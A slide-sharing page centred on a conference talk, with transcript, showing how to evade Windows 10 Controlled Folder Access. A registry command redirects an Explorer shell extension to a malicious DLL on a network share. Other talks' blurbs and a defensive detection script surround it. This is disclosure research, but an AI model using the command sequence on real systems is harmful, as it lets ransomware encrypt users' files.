The WannaCry cyber-attack all over the world in May 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of "Ransomware protection" through a demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you whether we may have to reconsider the definition of vulnerability.
Roy Levin, Microsoft
Mathias Scherman, Microsoft
Yotam Livny, Microsoft
As a Cloud Security provider, Azure Security Center collects logs from various services that contain potentially vast amounts of security information. However, parsing them to extract the most information is a hard task.
Artificial Intelligence techniques have proven to perform well for such pattern recognition tasks. In this talk, we will present a novel approach leveraging recent advances in Deep Learning to detect malicious IaaS VMs being compromised, using Windows Security Events.
Monthly DFIR Training in collaboration with DFIR Austin. This month's training covered the process of getting remote access during incident response investigations, delving into rapid agent deployment options such as GPOs and RMM tools as well as agentless triage channels such as WMI, Powershell Remoting, SSH, etc.
There is increased discussion around threats that adopt so-called “living off the land” tactics. Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory. Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.
Further reading:
Attackers are increasingly living off the land (https://www.symantec.com/connect/blogs/attackers-are-increasingly-living-land)
Living off the land and fileless attack techniques (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf)
Jagadeesh Parameswaran, Microsoft
Rahul Sachan, Microsoft
Windows Defender Advanced Threat Protection (WDATP) gives defenders unparalleled visibility into the enterprise. And Azure Advanced Threat Protection (AATP) gives the power to monitor attacks on the Domain Controllers and user identities. Come spend an hour with us as we pull back the covers and go through detailed examples of real attacks that we saw as we defended the Microsoft corporate environment using WDATP & AATP.
Dana Baril, Microsoft
Credential theft is an important part of the attacker playbook when attempting lateral movement. This process mostly involves dumping credentials saved locally on the machine. In many cases these passwords can be retrieved from the Windows Credential Manager, allowing attackers an easy path into the organization. This was evident in major attacks such as the NotPetya ransomware, and high-profile tools like Mimikatz.
In this talk, we explain how to detect credential theft from the Windows Credential Manager using Windows Defender Advanced Threat Protection (WDATP). This involves modifying the Windows operating system to send telemetry to the WDATP cloud, which was extended with new detection rules.
Threat actors are increasing their use of fileless malware for one simple reason: most organizations aren't prepared to detect it. Education is the first step in determining what threat these new attacks pose and what you can do to detect and stop fileless malware attacks. Learn more at: https://www.bluvector.io
International collaborative efforts to share threat data in a vetted member c... - CODE BLUE
The APWG has been sharing threat data for over 12 years to help protect organizations and all internet users against cyber threats. Initially founded to focus on phishing, as the threat landscape on the internet has grown, so has APWG. Today our vetted member community shares information to fight cybercrime and fraud not only on phishing but on numerous other types of threat data, including malicious IP addresses and ransomware information. This session will look at the history of sharing these types of data, how sharing has changed over the years and the necessity to automate these processes.
What you need to know about ExPetr ransomware - Kaspersky
On Thursday, 29 June, Kaspersky Lab teamed up with Comae Technologies to present an emergency webinar for businesses to help them understand and defend against the Petya/ExPetr ransomware. The malware has affected companies in a range of industry sectors across the world, with Ukraine, Russia and a number of Western European countries most affected.
Juan Andres Guerrero-Saade, senior security researcher in Kaspersky Lab’s Global Research and Analysis Team, will be joined by Matt Suiche from Comae Technologies to present the very latest information on the ransomware’s attack vectors, the infection process and how it spreads through company networks. They will provide mitigation guidance and explain the actions organizations need to take to secure their computers and networks against this threat.
More technical details regarding this threat: https://kas.pr/cf6w
Advice on how to protect your files: https://kas.pr/s8dp
https://kas.pr/2nvh
https://kas.pr/yg72
And how you can protect yourself with our free tool: https://go.kaspersky.com/Anti-ransomware-tool_soc.html?utm_source=smm_yt&utm_medium=ww_yt_o_0516
Oran Brill, Microsoft
Tomer Teller, Microsoft
How often did you find yourself analyzing a security alert only to find out you had already hunted similar alerts in the past? This déjà vu happens quite often to cybersecurity analysts who work in a SOC. What if we told you that most security alerts can be assigned a confidence score automatically, letting you, the analyst, focus on the most serious alerts? In this talk, we will present tools and techniques to automate the work of the human cybersecurity analyst by leveraging knowledge of past incidents, current security posture and a dash of crowdsourcing. Under the hood, we generate a "tailor-made" hunting graph based on diverse data sources and security know-how, which enables us to extract meaningful insights. By applying custom logic, aggregations and data science, we will illustrate how to uncover patterns within the insights and assign a confidence score with appropriate reasoning to the alert, automatically.
Humla workshop on Android Security Testing by Sai Sathya narayan Venkatraman, MWR Infosecurity
This workshop gives you hands on experience in identifying and exploiting the latest categories of vulnerabilities against modern Android applications based on real world examples. You’ll use the latest testing tools to assess, unravel and exploit applications, and learn about vulnerability classes unique to Android.
You will learn:
- To analyze applications from an attacker's perspective
- Basic understanding of the latest attack vectors against Android applications
- To perform black box security assessments against real world applications using the latest and widely used tools
More info here: http://www.meetup.com/Null-Singapore-The-Open-Security-Community/events/229931768/
Advanced OSSEC Training: Integration Strategies for Open Source Security - AlienVault
During this technical one-hour session, Santiago Gonzalez, an OSSEC core team member (System integration, rules & SIEM) and AlienVault Director of Professional Services, will demonstrate how to integrate OSSEC with other 3rd party applications for greater security visibility and response.
To learn more, check out the video: https://www.alienvault.com/resource-center/webcasts/advanced-ossec-training-integration-strategies-for-open-source-security
Best Practices for Configuring Your OSSIM Installation - AlienVault
Because every network environment is different, OSSIM offers flexible configuration options to adapt to the needs of different environments. Whether you are just getting started with OSSIM or have been using it for years, thinking through the configuration options available will help you get the most out of your installation.
Join us for this customer training webcast where our OSSIM experts will walk through:
How to deploy & configure OSSEC agents
Best practices for configuring syslog and enabling plugins
Scanning your network for assets and vulnerabilities
PIDS research slides from MALCON 2018 conference - Asaf Hecht
Research presentation of: Analysis and Detection of Network Printer Attacks.
Presented by Asaf Hecht at "the 13th International Conference on Malicious and Unwanted Software" (MALCON 2018) in Nantucket, USA.
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10 - Soya Aoyama
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i... - Alexander Benoit
AppLocker, Windows Information Protection, Device Guard, Windows Defender Application Guard - there are many ways to secure Windows 10. Not all ways are compatible with Enterprise requirements. In the session, we will have a look at what we are able to do and I will add some experiences from the field about what works well and what doesn't. In addition, we will check how ConfigMgr can support us.
Cybercrime is a business just like any other. And in business, there are budgets to stick to, and bosses to report to. Therefore, most cyber criminals are after easy money. They want quick wins with minimal effort – just because they can! Mass production is the key to profitability, even in the malware business.
Learn more about the specific actions you can and should take to secure your workstations in the webinar recording in the following link and the presentation slides here.
https://business.f-secure.com/defending-workstations-recording-from-cyber-security-webinar-2/
Join us this month as we recap the Microsoft and 3rd Party security patches released on Patch Tuesday. We will discuss things to watch out for, products to be sure to test adequately, and which patches should be highest priority to roll out.
Best practices to secure Windows 10 with already included features - Alexander Benoit
AppLocker, Windows Information Protection, Device Guard, WDAG - there are many ways to secure Windows 10. Not all ways are compatible with enterprise requirements. In the session, we look at what we are able to do and discuss experiences from the field around what works well and what doesn’t. In addition, we check how Configuration Manager can support us.
https://youtu.be/zqUwgLDmCqY
Reducing attack surface on ICS with Windows native solutions - Jan Seidl
Presentation given at the 4SICS conference in Stockholm, Sweden, about using Windows built-in solutions like Software Restriction Policies/AppLocker, EMET and other minor things.
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx - eugeniadean34240
RUNNING HEAD: MANAGING HOST BASED SECURITY IN WINDOWS 8.1
Lab Deliverable for Lab 2
a. Procedure to Manage Windows Defender
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Description:
This Windows configuration project will require system admin permission so as to access the programs and get to know how it is commanded to the action it should perform. Also, to use a virtual box one should have knowledge of how to operate the virtual box and explore the virtual programs.
Notes, Warnings and Restrictions:
1. Windows Defender comes with Windows 8.1 and is found in the Control Panel.
2. The application is used only when you log in to your system as an administrator or have been permitted to act as the administrator.
3. For Windows Defender to run in the system it should be turned on and no other antivirus should be active.
4. Scanning the system with Windows Defender deletes infected files. Also ensure you do the required scanning.
5. If a different antivirus has been previously deleted, then Windows Defender needs to be turned off and restarted.
Resources (Further Reading):
Firewalls. (n.d.). Retrieved from https://technet.microsoft.com/en-us/library/cc700820.aspx
Microsoft Baseline Security Analyzer. (2011). Retrieved from https://dougvitale.wordpress.com/2011/11/18/microsoft-baseline-security-analyzer/
CloudFlare. (n.d.). Retrieved from https://www.winhelp.us/configure-windows-defender-in-windows-8.html
Procedures:
Windows defender
Windows Defender protects a computer system against any form of malware by running in the background of the computer system and gives a notification if any suspicious item is found in the system for the user to take action. It can also be used to scan the system if the system has issues, e.g. becomes slow, switches off when not commanded to, or hangs, among other things. Windows Defender should be updated over time so that it is not outdated and also to improve its performance.
Windows Defender is found in the Control Panel; the steps to open it are:
i. Open control panel and select “windows defender”
ii. While you click on windows defender, the following page appears
a) To update the system click on “update”
b) Real time scanning
c) For the full scan results it will appear in the table as shown below
d) For quick results check the button just before you click on scan. Then the results will appear as shown below.
e) To scan removable device, select “setting” and click on advance
Then check the box just before removing any removable drivers and click save
b. Procedure to configure Windows Firewall for Windows 8.1
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Descriptions:
Windows Firewall is a protection application that protects against suspicious items. It helps in blocking suspicious programs.
Ramnit is a worm that spreads through removable drives by infecting files. The worm (W32.Ramnit) was first discovered in early 2010 and later that year, a second variant of Ramnit (W32.Ramnit.B) was identified. Since then, Ramnit’s operators have made considerable upgrades to the threat, including implementing the use of modules, which was borrowed from the leaked source code of the Zeus banking Trojan (Trojan.Zbot) in May 2011.
Currently, Ramnit’s operators are primarily focused on information-stealing tactics, targeting data such as passwords and online banking login credentials. They also install remote access tools on affected computers in order to maintain back door connectivity. It is estimated that the Ramnit botnet may consist of up to 350,000 compromised computers worldwide.
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack - Soya Aoyama
How many sites do you use? Is the password long enough and secure? Do not tell me you reused it.
Unfortunately, we do not have a memory good enough to remember so many long and secure passwords.
For this reason, there are several companies providing password management applications. However, are they really secure?
I have executed a man-in-the-middle attack against a certain password management application.
Surprisingly, the password was exchanged in plain text between .exe and .dll, and it was very easy to steal it.
The program I created is generic and, under certain conditions, can steal information between all .exe and .dll in Windows.
In this talk, I will demonstrate the actual attack, and provide technical explanations to enable this attack. And finally, I suggest ways to protect other apps from this attack.
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaYara Milbes
Discover the transformative power of the WhatsApp API in our latest SlideShare presentation, "Top 7 Unique WhatsApp API Benefits." In today's fast-paced digital era, effective communication is crucial for both personal and professional success. Whether you're a small business looking to enhance customer interactions or an individual seeking seamless communication with loved ones, the WhatsApp API offers robust capabilities that can significantly elevate your experience.
In this presentation, we delve into the top 7 distinctive benefits of the WhatsApp API, provided by the leading WhatsApp API service provider in Saudi Arabia. Learn how to streamline customer support, automate notifications, leverage rich media messaging, run scalable marketing campaigns, integrate secure payments, synchronize with CRM systems, and ensure enhanced security and privacy.
Large Language Models and the End of ProgrammingMatt Welsh
Talk by Matt Welsh at Craft Conference 2024 on the impact that Large Language Models will have on the future of software development. In this talk, I discuss the ways in which LLMs will impact the software industry, from replacing human software developers with AI, to replacing conventional software with models that perform reasoning, computation, and problem-solving.
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
GraphSummit Paris - The art of the possible with Graph TechnologyNeo4j
Sudhir Hasbe, Chief Product Officer, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...Juraj Vysvader
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I didn't get rich from it but it did have 63K downloads (powered possible tens of thousands of websites).
Listen to the keynote address and hear about the latest developments from Rachana Ananthakrishnan and Ian Foster who review the updates to the Globus Platform and Service, and the relevance of Globus to the scientific community as an automation platform to accelerate scientific discovery.
Understanding Globus Data Transfers with NetSageGlobus
NetSage is an open privacy-aware network measurement, analysis, and visualization service designed to help end-users visualize and reason about large data transfers. NetSage traditionally has used a combination of passive measurements, including SNMP and flow data, as well as active measurements, mainly perfSONAR, to provide longitudinal network performance data visualization. It has been deployed by dozens of networks world wide, and is supported domestically by the Engagement and Performance Operations Center (EPOC), NSF #2328479. We have recently expanded the NetSage data sources to include logs for Globus data transfers, following the same privacy-preserving approach as for Flow data. Using the logs for the Texas Advanced Computing Center (TACC) as an example, this talk will walk through several different example use cases that NetSage can answer, including: Who is using Globus to share data with my institution, and what kind of performance are they able to achieve? How many transfers has Globus supported for us? Which sites are we sharing the most data with, and how is that changing over time? How is my site using Globus to move data internally, and what kind of performance do we see for those transfers? What percentage of data transfers at my institution used Globus, and how did the overall data transfer performance compare to the Globus users?
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Mind IT Systems
Healthcare providers often struggle with the complexities of chronic conditions and remote patient monitoring, as each patient requires personalized care and ongoing monitoring. Off-the-shelf solutions may not meet these diverse needs, leading to inefficiencies and gaps in care. It’s here, custom healthcare software offers a tailored solution, ensuring improved care and effectiveness.
We describe the deployment and use of Globus Compute for remote computation. This content is aimed at researchers who wish to compute on remote resources using a unified programming interface, as well as system administrators who will deploy and operate Globus Compute services on their research computing infrastructure.
7. TANMAY GANACHARYA
Principal Group Manager, Windows Defender Research
Ransomware protection on Windows 10
For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.
https://www.microsoft.com/security/blog/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access/
20. YAGO JESUS
MICROSOFT ANTI RANSOMWARE BYPASS
By default, Office executables are included in the whitelist, so these programs can make changes in protected folders without restrictions.
This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically.
So a ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly to the file's owner.
http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html
37. This is revenge
• Step-by-step instructions to reproduce the issue on a fresh install
1. Put the malicious dll on a shared file server. (\\10.0.1.40\share\Anti-ControlledFolderAccess.dll)
2. Start cmd.exe on the target PC. (Administrator privilege is NOT required)
3. Execute the following command.
4. Start procexp.exe on the target PC.
reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll
taskkill /IM explorer.exe /F
start explorer.exe
39. Microsoft Security Servicing Criteria for Windows
Security boundaries (security boundary: security goal)
Network boundary: An unauthorized network endpoint cannot access or tamper with the code and data on a customer’s device.
Kernel boundary: A non-administrative user mode process cannot access or tamper with kernel code and data. Administrator-to-kernel is not a security boundary.
Process boundary: An unauthorized user mode process cannot access or tamper with the code and data of another process.
AppContainer sandbox boundary: An AppContainer-based sandbox process cannot access or tamper with code and data outside of the sandbox based on the container capabilities.
User boundary: A user cannot access or tamper with the code and data of another user without being authorized.
Session boundary: A user logon session cannot access or tamper with another user logon session without being authorized.
Web browser boundary: An unauthorized website cannot violate the same-origin policy, nor can it access or tamper with the native code and data of the Microsoft Edge web browser sandbox.
Virtual machine boundary: An unauthorized Hyper-V guest virtual machine cannot access or tamper with the code and data of another guest virtual machine; this includes Hyper-V Isolated Containers.
Virtual Secure Mode boundary: Data and code within a VSM trustlet or enclave cannot be accessed or tampered with by code executing outside of the VSM trustlet or enclave.
40. NOT covered by active bug bounty programs.
Defense-in-depth security features (security feature: security goal)
User Account Control (UAC): Prevent unwanted system-wide changes (files, registry, etc) without administrator consent
AppLocker: Prevent unauthorized applications from executing
Controlled Folder Access: Protect access and modification to controlled folders from apps that may be malicious
Mark of the Web (MOTW): Prevent active content download from the web from elevating privileges when viewed locally
Kernel Address Space Layout Randomization (KASLR): The layout of the kernel virtual address space is not predictable to an attacker (on 64-bit)
Control Flow Guard (CFG): CFG protected code can only make indirect calls to valid indirect call targets
Windows Defender Exploit Guard (WDEG): Allow apps to enable additional defense-in-depth exploit mitigation features that make it more difficult to exploit vulnerabilities
Protected Process Light (PPL): Prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions
Shielded Virtual Machines: Help protect a VM’s secrets and its data against malicious fabric admins or malware running on the host from both runtime and offline attacks
https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
41. I can
- Escalate privileges to administrator
- Evade the Ransomware Protection
by injecting into Explorer
42. I’d like to suggest to Microsoft
- Load only signed dlls
- Implement the ControlledDllLoad mechanism
Hello everyone.
Today, I’ll give a presentation about… "Evading the Ransomware Protection in Windows 10"
This is an inconvenient truth for Microsoft.
I’ll be happy to answer any questions… at the end of my talk.
⏎
First, let me introduce myself.
I’m Soya Aoyama.
I’m a security researcher @ Fujitsu System Integration Laboratories Limited, and an organizer @ B-Sides Tokyo.
I’ve been working for Fujitsu for more than 20 years… as a Windows software developer. I wrote NDIS drivers, Bluetooth profiles, Winsock applications, and more.
I started security research… about 4 years ago.
My first presentation was @ AV-TOKYO. It’s one of the most famous security conferences in Japan, and the motto is “no drink, no hack.”
So, I gave a presentation while drinking. To be honest, I’d like to do the same today, but I’ll refrain from it.
⏎
This is the history of my research.
3 years ago, I was researching jumping the Air-Gap via Wi-Fi.
I needed administrator privileges… to change the Wi-Fi settings. I replaced OneDrive’s dll with a malicious one, and injected a malicious program into Explorer. The program injected itself into another application, and got administrator privileges.
2 years ago, I talked about the method @ B-Sides Las Vegas.
And now, I found a way to evade the Ransomware Protection in Windows 10… using a malicious dll.
I’ll explain the details from here.
⏎
May 12, 2017… Do you remember?
⏎
Yes. It’s the day of the cyber-attack by WannaCry.
WannaCry caused tremendous damage… all over the world.
⏎
Microsoft gave one answer against ransomware such as WannaCry.
It’s literally...
⏎
Ransomware protection!!
This is part of a quote from a Microsoft blog.
Actually, there is more description. I didn’t want to read it, so I examined the actual behavior.
I’ll explain the behavior of "Ransomware protection", and the minor issues found during the examination.
⏎
This is the “Ransomware protection” screen… in Windows Defender Security Center.
Ransomware protection is off by default, and if you turn it on,
⏎
“Protected folders” and
“allow an app through Controlled folder access” are displayed.
We’ll look at each item in detail.
⏎
First, it’s “Protected folders”.
You can add the folders… that you want to protect.
And this is a list of folders protected by default. Documents, Pictures, Videos, Music, Desktop and Favorites.
Just a moment.
⏎
There is the phrase… “Windows system folders are protected by default” here.
The system folder is usually “c:\windows\system32”.
However, the folder is not included in this list.
⏎
What is the truth? I’ll show you in a demonstration now.
[DEMO 1]
The truth is…
⏎
The Windows system folder is not protected by default.
I think that Microsoft should rewrite… “Windows system folder” as “user data folder”.
⏎
Next, it’s “Allow an app through Controlled folder access”.
You can add the applications… that you want to allow access to the “Protected folders”.
Unlike the previous screen, there is no default list.
Just a moment.
⏎
There is the phrase… “Apps determined by Microsoft as friendly are always allowed“ here.
Which applications are “friendly”? From the previous demonstration, we know that PowerShell is not covered.
It seems… that not all Microsoft applications are included as “friendly”. Then what about third-party applications?
⏎
What is the truth? I’ll show you in a demonstration now.
[DEMO 2]
The truth is…
⏎
Only Microsoft knows.
⏎
This is the mechanism of Ransomware protection.
All applications have access to all folders… by default.
When the administrator enables “controlled folder access”,
⏎
only “allowed apps” can access “protected folders”, and other apps cannot access them.
⏎
The administrator can add apps to “allowed apps”,
⏎
and folders to “protected folders”.
⏎
You Ain’t Seen Nothin’ Yet!
Now, I found a vulnerability in “Ransomware protection”.
⏎
This idea is very simple.
⏎
We can probably access the “protected folders”… by injecting malware into the “allowed apps”.
⏎
As I thought, there was similar research.
Yago’s idea is using Microsoft Office.
He succeeded in accessing the protected folders… using an OLE object… with embedded malware.
⏎
What is my method?
I’ll show you in a demonstration now.
[DEMO 3]
My method is…
⏎
Just use the registry.
I will explain the mechanism.
⏎
Needless to say, it’s the registry.
There is a shell extension list, loaded by Explorer.
This time,
⏎
I used this GUID.
⏎
The actual value of the GUID is under HKCR.
It’s shell32.dll.
⏎
HKCR is described on Windows Dev Center.
Simply speaking, HKCR merges HKLM with HKCU, and HKCU takes precedence over HKLM.
You need administrator privileges… to change values in HKLM, unlike HKCU.
This means… that values which are only writable with administrator privileges… can be overridden by values writable with user privileges.
Is this a bug? Wrong. For example, Explorer is assigned as the default application… for decompressing zip files.
However, you may want to use a different application like 7zip. This registry exists for that assignment.
This time, I abuse this specification.
⏎
In the case of this GUID, there is dll information in HKLM, but not in HKCU.
So, if we write another value to HKCU, we can change the value in HKCR.
⏎
This is the file encryption process.
Normally, the value in HKLM is reflected in HKCR, Explorer reads it, and loads the correct dll.
However, we can write the path of a malicious dll in HKCU… with user privileges,
⏎
and its value is reflected in HKCR.
⏎
Explorer reads it, and loads malicious dll.
⏎
As a result,
⏎
the malicious DLL loaded into Explorer can encrypt the user’s files.
⏎
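A defender-side check for the HKCU-over-HKLM CLSID shadowing just described. This is an added example, not code from the talk or from Microsoft; the function name Get-UserClsidShadows and the per-entry fields are my own choices, and it only reads the two hives and the DLL signatures.

```powershell
# Added example, not from the talk: find per-user COM server registrations under
# HKCU\Software\Classes\CLSID that shadow a machine-wide (HKLM) registration.
# HKCR merges both hives with HKCU winning, so a user-writable InprocServer32 can
# redirect a shell extension load in Explorer. Reading both hives needs no admin rights.
function Get-UserClsidShadows {
    [CmdletBinding()]
    param(
        [string]$UserRoot    = 'HKCU:\Software\Classes\CLSID',
        [string]$MachineRoot = 'HKLM:\Software\Classes\CLSID'
    )

    if (-not (Test-Path -Path $UserRoot)) { return @() }

    $findings = @()
    foreach ($clsidKey in Get-ChildItem -Path $UserRoot -ErrorAction SilentlyContinue) {
        $clsid   = $clsidKey.PSChildName
        $userSrv = Join-Path -Path $clsidKey.PSPath -ChildPath 'InprocServer32'
        if (-not (Test-Path -Path $userSrv)) { continue }

        # The (default) value is the DLL path every COM client, Explorer included, will load.
        $userDll = (Get-ItemProperty -Path $userSrv -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($userDll)) { continue }

        # Is there a machine-wide registration that this per-user key overrides?
        $machineSrv = Join-Path -Path $MachineRoot -ChildPath "$clsid\InprocServer32"
        $machineDll = $null
        if (Test-Path -Path $machineSrv) {
            $machineDll = (Get-ItemProperty -Path $machineSrv -ErrorAction SilentlyContinue).'(default)'
        }

        # Expand %SystemRoot%-style variables, then check where the DLL lives and whether it is signed.
        $expanded = [Environment]::ExpandEnvironmentVariables($userDll)
        $sigState = 'FileNotFound'
        if (Test-Path -LiteralPath $expanded -PathType Leaf) {
            $sigState = (Get-AuthenticodeSignature -FilePath $expanded).Status.ToString()
        }

        $findings += [pscustomobject]@{
            CLSID          = $clsid
            UserDll        = $userDll
            MachineDll     = $machineDll
            ShadowsMachine = ($null -ne $machineDll)                 # HKCU entry overrides HKLM
            IsUncPath      = $expanded.StartsWith('\\')              # served from a file share
            OutsideWindows = -not $expanded.StartsWith($env:SystemRoot, 'OrdinalIgnoreCase')
            SignatureState = $sigState                               # 'Valid' for a trusted signature
        }
    }
    return $findings
}

# Triage list: shadowing HKLM, loading from a share, or lacking a valid signature all warrant
# a closer look. Legitimate per-user COM registrations (user-installed apps) appear here too,
# so investigate before removing anything.
Get-UserClsidShadows |
    Where-Object { $_.ShadowsMachine -or $_.IsUncPath -or $_.SignatureState -ne 'Valid' } |
    Format-Table -AutoSize
```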
We now understand the “Ransomware protection” of Windows 10.
Then, how about other anti-malware applications?
⏎
This is slightly old information, but this is the market share of Windows anti-malware application vendors.
⏎
There are Avast, ESET, Malwarebytes, McAfee, and more.
I checked several anti-malware applications.
⏎
First, it’s Avast Internet Security. It has
⏎
the “Ransomware Shield”. However,
⏎
my malicious dll was able to encrypt the text file… without the file being protected.
⏎
Next, it’s ESET Smart Security. It has
⏎
the “Ransomware Shield”. However,
⏎
it’s the same result.
⏎
Next, it’s Malwarebytes Premium. It has
⏎
the “Ransomware Protection”. However,
⏎
it’s the same result.
⏎
Next, it’s McAfee Total Protection. It has
⏎
the “Ransomware Interceptor”. However,
⏎
it’s the same result.
⏎
As far as I’ve checked, anti-malware applications cannot protect against my ransomware.
Of course, there may be applications that can protect against it at this time.
⏎
3 years ago, I submitted a vulnerability report… to the Microsoft Security Response Center… about being able to inject into Explorer… using the OneDrive problem.
Because I thought it was a very dangerous vulnerability, and I wanted a little pocket money.
However, MSRC said… they did not have to pay a reward.
⏎
This is revenge.
Unlike the last time, it’s a basic problem with the Windows 10 registry.
The result is…
⏎
As I thought, it was the same answer.
⏎
Because this does not meet the bar for security servicing.
⏎
I cannot receive a reward every time, so I examined the bar for security servicing.
Certainly, this problem does not seem to meet it.
⏎
Moreover,
⏎
It was written… that “Controlled Folder Access” is not covered by the Bug Bounty program.
It cannot be helped. I’ll give up on the reward money.
⏎
However, by injecting into Explorer,
“escalating privileges to administrator” and
“evading the Ransomware Protection” are an unwavering fact.
Is it okay to leave the problem as it is?
⏎
Therefore, I’d like to suggest the following implementation to Microsoft… as one of the defense-in-depth security features.
First, load only signed dlls.
This prevents the loading of a tampered dll.
The other is to implement the “Controlled dll load” mechanism.
This means that the user selects the DLLs… that a process can load, like “Controlled Folder Access”.
I think that Microsoft needs to take action as soon as possible, as it does for anything else.
⏎